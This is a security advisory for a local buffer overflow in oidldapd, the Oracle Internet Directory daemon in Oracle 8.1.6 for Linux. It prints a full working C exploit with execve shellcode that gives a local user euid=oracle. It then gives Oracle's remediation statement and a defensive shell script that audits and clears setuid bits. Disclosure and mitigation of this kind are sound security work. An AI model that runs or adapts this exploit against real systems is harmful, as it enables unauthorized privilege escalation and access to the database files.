Vulnerability

oidldapd

Affected

Oracle Internet Directory

Description

Juan Manuel Pascual found the following (tested with oidldapd in Oracle 8.1.6). There is a buffer overflow in oidldapd that can be used by local users to obtain the euid of the oracle user. With the default installation the oracle user owns all database files. Any user with local access can gain euid=oracle.

/* Exploit code for oidldapd in Oracle 8.1.6 (8iR2) for Linux.
   I tested it on RH 6.2 and 6.1.
   This code is bullshit (I know, please no comments about it ;-)).
   If someone ports this to Sparc please tell me.
   synopsis: buffer overflow in oidldapd
   impact:   any user gains euid=oracle.
   Dedicated to the PlazaSite guys. Klink Klink Team. Panxeta, Entrophy and others. */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strlen, memcpy: missing from the original listing */

#define DEFAULT_OFFSET      13
#define DEFAULT_BUFFER_SIZE 700
#define NOP                 0x90
#define ORACLE_HOME "/usr/local/oracle/app/oracle/product/8.1.6"

/* Linux/x86 execve("/bin/sh") payload */
char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* Current stack pointer, used to guess where the buffer will land (x86 only) */
unsigned long get_sp(void)
{
    unsigned long sp;
    __asm__("movl %%esp,%0" : "=r"(sp));
    return sp;
}

int main(int argc, char *argv[])
{
    char *buff, *ptr, envbuf[100], binary[120];
    long *addr_ptr, addr;
    int offset = DEFAULT_OFFSET, bsize = DEFAULT_BUFFER_SIZE;
    int i;

    buff = malloc(bsize);
    if (buff == NULL) {
        perror("malloc");
        return 1;
    }
    addr = get_sp() - offset;

    /* fill the whole buffer with the guessed address ... */
    ptr = buff;
    addr_ptr = (long *) ptr;
    for (i = 0; i < bsize; i += 4)
        *(addr_ptr++) = addr;

    /* ... put a NOP sled in the first half ... */
    for (i = 0; i < bsize / 2; i++)
        buff[i] = NOP;

    /* ... and the shellcode in the middle */
    ptr = buff + ((bsize / 2) - (strlen(shellcode) / 2));
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];
    buff[bsize - 1] = '\0';

    /* export the payload as $EGG and pass it to oidldapd in the connect= argument */
    memcpy(buff, "EGG=", 4);
    putenv(buff);
    sprintf(envbuf, "ORACLE_HOME=%s", ORACLE_HOME);
    putenv(envbuf);
    sprintf(binary, "%s/bin/oidldapd connect=$EGG", ORACLE_HOME);
    system(binary);
    return 0;
}

Solution

The Linux version of Oracle Internet Directory (mentioned in the alert) is not a production release from Oracle; though Oracle Internet Directory 2.0.6 was never released on Linux, the OID binaries were accidentally shipped with the 8.1.6 Linux port and apparently install by default. Oracle's position is that this should be regarded as a "pre-alpha" product, is not supported, and should under no circumstances be put into production in a customer's environment. Oracle apologizes for this mistake and regrets any inconvenience this has caused our customers. Oracle encourages all Linux directory developers to download the upcoming production version of Oracle Internet Directory, v2.1.1, part of the Oracle 8.1.7 (8i Release 3) server media pack, from http://technet.oracle.com/.
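The vulnerability is only reachable because oidldapd is installed setuid to the oracle user, and Oracle's answer is not to run this pre-alpha build at all. As an added example that is not part of the advisory or of Oracle's software, the following POSIX shell script audits an installation's bin directory for setuid/setgid executables, flags oidldapd if it is among them, and clears the bits on a binary an administrator must keep on disk. The function names are my own, the ORACLE_HOME default is the path the exploit above hard-codes, and clearing the bits rather than deleting the file is an assumption about what an administrator might prefer; only test(1) and chmod(1) are used, so it runs under any /bin/sh.

```shell
#!/bin/sh
# Added example (not from the advisory): audit an Oracle 8.1.6 bin directory
# for setuid/setgid executables such as the accidentally shipped oidldapd.
# ORACLE_HOME default is the one assumed by the exploit listing; override it
# in the environment for the installation being checked.

ORACLE_HOME="${ORACLE_HOME:-/usr/local/oracle/app/oracle/product/8.1.6}"

# list_setuid DIR
#   Print, one per line, the regular files directly inside DIR that carry the
#   setuid or setgid bit. POSIX test(1) operators only.
list_setuid() {
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        if [ -u "$f" ] || [ -g "$f" ]; then
            printf '%s\n' "$f"
        fi
    done
}

# count_setuid DIR
#   Number of setuid/setgid regular files directly inside DIR.
count_setuid() {
    list_setuid "$1" | wc -l | tr -d ' '
}

# is_setuid FILE
#   Succeeds when FILE has the setuid bit: the condition that lets a local
#   user run the binary with euid=oracle.
is_setuid() {
    [ -u "$1" ]
}

# strip_setuid FILE
#   Mitigation for an unsupported binary that must stay on disk: clear the
#   setuid and setgid bits so it runs with the caller's own uid.
strip_setuid() {
    chmod u-s,g-s "$1" && printf 'cleared setuid/setgid on %s\n' "$1"
}

# audit_oracle_bin [ORACLE_HOME]
#   Report every setuid/setgid file in $ORACLE_HOME/bin.
#   Returns 1 when oidldapd is present and setuid/setgid, 0 when it is not,
#   2 when the bin directory does not exist.
audit_oracle_bin() {
    home="${1:-$ORACLE_HOME}"
    bindir="$home/bin"
    [ -d "$bindir" ] || { printf 'no such directory: %s\n' "$bindir" >&2; return 2; }
    found=0
    for f in "$bindir"/*; do
        [ -f "$f" ] || continue
        if [ -u "$f" ] || [ -g "$f" ]; then
            printf 'setuid/setgid: %s\n' "$f"
            case "$f" in
                */oidldapd) found=1 ;;
            esac
        fi
    done
    return $found
}

# Usage (run as the oracle user or root):
#   audit_oracle_bin || strip_setuid "$ORACLE_HOME/bin/oidldapd"
```

The audit deliberately lists every privileged binary rather than only oidldapd, since the same packaging mistake could affect other files in the directory; review each one against the vendor's documentation before clearing its bits.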